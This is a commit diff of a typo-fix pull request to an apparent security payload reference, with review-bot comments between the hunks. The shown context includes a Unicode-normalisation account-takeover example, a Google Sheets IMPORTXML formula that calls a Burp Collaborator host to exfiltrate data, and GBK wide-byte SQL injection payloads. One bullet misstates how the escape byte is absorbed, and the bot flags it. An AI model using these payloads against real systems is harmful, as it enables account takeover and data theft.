Merge pull request #787 from clemensGooooo/master

Fixed several typos
Swissky 2025-07-29 19:09:56 +02:00 committed by GitHub
commit 178949896f
No known key found for this signature in database
GPG key ID: B5690EEEBB952194
4 changed files with 8 additions and 8 deletions


@ -13,7 +13,7 @@
* [Leaking Password Reset Token](#leaking-password-reset-token) * [Leaking Password Reset Token](#leaking-password-reset-token)
* [Password Reset via Username Collision](#password-reset-via-username-collision) * [Password Reset via Username Collision](#password-reset-via-username-collision)
* [Account Takeover Due To Unicode Normalization Issue](#account-takeover-due-to-unicode-normalization-issue) * [Account Takeover Due To Unicode Normalization Issue](#account-takeover-due-to-unicode-normalization-issue)
* [Account Takeover via Web Vulneralities](#account-takeover-via-web-vulneralities) * [Account Takeover via Web Vulnerabilities](#account-takeover-via-web-vulnerabilities)
* [Account Takeover via Cross Site Scripting](#account-takeover-via-cross-site-scripting) * [Account Takeover via Cross Site Scripting](#account-takeover-via-cross-site-scripting)
* [Account Takeover via HTTP Request Smuggling](#account-takeover-via-http-request-smuggling) * [Account Takeover via HTTP Request Smuggling](#account-takeover-via-http-request-smuggling)
* [Account Takeover via CSRF](#account-takeover-via-csrf) * [Account Takeover via CSRF](#account-takeover-via-csrf)
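Review bot: the TOC anchor change on the `Account Takeover via Web Vulneralities` line is only correct because the matching heading is renamed in the `@ -119` hunk of the same file; the two edits must land in the same commit so the in-page link does not break in between. Any existing external link to the old `#account-takeover-via-web-vulneralities` fragment will stop resolving after the merge, which is acceptable for a typo fix but worth a line in the PR description.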
@ -110,7 +110,7 @@ See: [CVE-2020-7245](https://nvd.nist.gov/vuln/detail/CVE-2020-7245)
### Account Takeover Due To Unicode Normalization Issue ### Account Takeover Due To Unicode Normalization Issue
When processing user input involving unicode for case mapping or normalisation, unexcepted behavior can occur. When processing user input involving unicode for case mapping or normalisation, unexpected behavior can occur.
* Victim account: `demo@gmail.com` * Victim account: `demo@gmail.com`
* Attacker account: `demⓞ@gmail.com` * Attacker account: `demⓞ@gmail.com`
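Review bot: the `unexcepted` to `unexpected` correction is right, but the same line mixes British `normalisation` with American `behavior`; since the line is being touched anyway, pick one spelling (the heading directly above already uses `Normalization`).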
@ -119,7 +119,7 @@ When processing user input involving unicode for case mapping or normalisation,
[Unicode pentester cheatsheet](https://gosecure.github.io/unicode-pentester-cheatsheet/) can be used to find list of suitable unicode characters based on platform. [Unicode pentester cheatsheet](https://gosecure.github.io/unicode-pentester-cheatsheet/) can be used to find list of suitable unicode characters based on platform.
## Account Takeover via Web Vulneralities ## Account Takeover via Web Vulnerabilities
### Account Takeover via Cross Site Scripting ### Account Takeover via Cross Site Scripting
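Review bot: the heading rename matches the anchor updated in the `@ -13` hunk, so the intra-page link stays valid. The unchanged context line above the heading still reads `can be used to find list of suitable unicode characters`, which is missing an article (`find a list of`); since this PR is a typo sweep, it would be worth including here.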


@ -65,7 +65,7 @@ Technical details of the above payloads:
### Google Sheets ### Google Sheets
Google Sheets allows some additionnal formulas that are able to fetch remote URLs: Google Sheets allows some additional formulas that are able to fetch remote URLs:
* [IMPORTXML](https://support.google.com/docs/answer/3093342?hl=en)(url, xpath_query, locale) * [IMPORTXML](https://support.google.com/docs/answer/3093342?hl=en)(url, xpath_query, locale)
* [IMPORTRANGE](https://support.google.com/docs/answer/3093340)(spreadsheet_url, range_string) * [IMPORTRANGE](https://support.google.com/docs/answer/3093340)(spreadsheet_url, range_string)
@ -79,7 +79,7 @@ So one can test blind formula injection or a potential for data exfiltration wit
=IMPORTXML("http://burp.collaborator.net/csv", "//a/@href") =IMPORTXML("http://burp.collaborator.net/csv", "//a/@href")
``` ```
Note: an alert will warn the user a formula is trying to contact an external ressource and ask for authorization. Note: an alert will warn the user a formula is trying to contact an external resource and ask for authorization.
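Review bot: `ressource` to `resource` is correct; while on this line, `warn the user a formula is trying to contact` reads better as `warn the user that a formula is trying to contact an external resource`. That prompt is the only control between a pasted formula and an outbound request, so the note describing it should be as clear as possible.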
## References ## References


@ -188,7 +188,7 @@ Creating your own randomness algorithm is generally not recommended. Below are s
### Tools ### Tools
Generic identification and sandwitch attack: Generic identification and sandwich attack:
* [AethliosIK/reset-tolkien](https://github.com/AethliosIK/reset-tolkien) - Insecure time-based secret exploitation and Sandwich attack implementation Resources * [AethliosIK/reset-tolkien](https://github.com/AethliosIK/reset-tolkien) - Insecure time-based secret exploitation and Sandwich attack implementation Resources
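Review bot: `sandwitch` to `sandwich` is correct, but the fixed line now says `sandwich attack` in lowercase while the tool description on the next line says `Sandwich attack`; pick one capitalisation. The trailing `Resources` on the tool line should also be checked: if it is part of the bullet text rather than the following heading, it needs its own line.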


@ -718,7 +718,7 @@ Wide byte injection is a specific type of SQL injection attack that targets appl
The `SET NAMES gbk` query can be exploited in a charset-based SQL injection attack. When the character set is set to GBK, certain multibyte characters can be used to bypass the escaping mechanism and inject malicious SQL code. The `SET NAMES gbk` query can be exploited in a charset-based SQL injection attack. When the character set is set to GBK, certain multibyte characters can be used to bypass the escaping mechanism and inject malicious SQL code.
Several characters can be used to triger the injection. Several characters can be used to trigger the injection.
* `%bf%27`: This is a URL-encoded representation of the byte sequence `0xbf27`. In the GBK character set, `0xbf27` decodes to a valid multibyte character followed by a single quote ('). When MySQL encounters this sequence, it interprets it as a single valid GBK character followed by a single quote, effectively ending the string. * `%bf%27`: This is a URL-encoded representation of the byte sequence `0xbf27`. In the GBK character set, `0xbf27` decodes to a valid multibyte character followed by a single quote ('). When MySQL encounters this sequence, it interprets it as a single valid GBK character followed by a single quote, effectively ending the string.
* `%bf%5c`: Represents the byte sequence `0xbf5c`. In GBK, this decodes to a valid multi-byte character followed by a backslash (`\`). This can be used to escape the next character in the sequence. * `%bf%5c`: Represents the byte sequence `0xbf5c`. In GBK, this decodes to a valid multi-byte character followed by a backslash (`\`). This can be used to escape the next character in the sequence.
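Review bot: the `%bf%5c` bullet in the unchanged context describes `0xbf5c` as a multi-byte character followed by a backslash that "can be used to escape the next character", which contradicts the explanation in the `@ -756` hunk of this same file, where the `0x5c` byte is consumed as the trailing byte of the wide character (the character "eats" the escape). Suggest rewording to: the `0x5c` byte that escaping inserts is absorbed into the two-byte GBK character, so the quote that follows is no longer escaped. Adjacent bullets also use `multibyte` and `multi-byte`; pick one.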
@ -756,7 +756,7 @@ For instance, if the input is `?id=1'`, PHP will add a backslash, resulting in t
However, when the sequence `%df` is introduced before the single quote, as in `?id=1%df'`, PHP still adds the backslash. This results in the SQL query: `SELECT * FROM users WHERE id='1%df\'' LIMIT 0,1`. However, when the sequence `%df` is introduced before the single quote, as in `?id=1%df'`, PHP still adds the backslash. This results in the SQL query: `SELECT * FROM users WHERE id='1%df\'' LIMIT 0,1`.
In the GBK character set, the sequence `%df%5c` translates to the character `連`. So, the SQL query becomes: `SELECT * FROM users WHERE id='1連'' LIMIT 0,1`. Here, the wide byte character `連` effectively "eating" the added escape charactr, allowing for SQL injection. In the GBK character set, the sequence `%df%5c` translates to the character `連`. So, the SQL query becomes: `SELECT * FROM users WHERE id='1連'' LIMIT 0,1`. Here, the wide byte character `連` effectively "eating" the added escape character, allowing for SQL injection.
Therefore, by using the payload `?id=1%df' and 1=1 --+`, after PHP adds the backslash, the SQL query transforms into: `SELECT * FROM users WHERE id='1連' and 1=1 --+' LIMIT 0,1`. This altered query can be successfully injected, bypassing the intended SQL logic. Therefore, by using the payload `?id=1%df' and 1=1 --+`, after PHP adds the backslash, the SQL query transforms into: `SELECT * FROM users WHERE id='1連' and 1=1 --+' LIMIT 0,1`. This altered query can be successfully injected, bypassing the intended SQL logic.
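Review bot: `charactr` to `character` is correct, but the sentence is still ungrammatical: `the wide byte character 連 effectively "eating" the added escape character` needs a finite verb, e.g. `effectively eats the added escape character`. Since the walkthrough on these lines ends at the successful injection, a follow-up could add the usual mitigation next to it: set the connection charset through the client library (PHP's `mysqli_set_charset()`) rather than with a `SET NAMES` query, so the escaping routine and the server agree on the encoding.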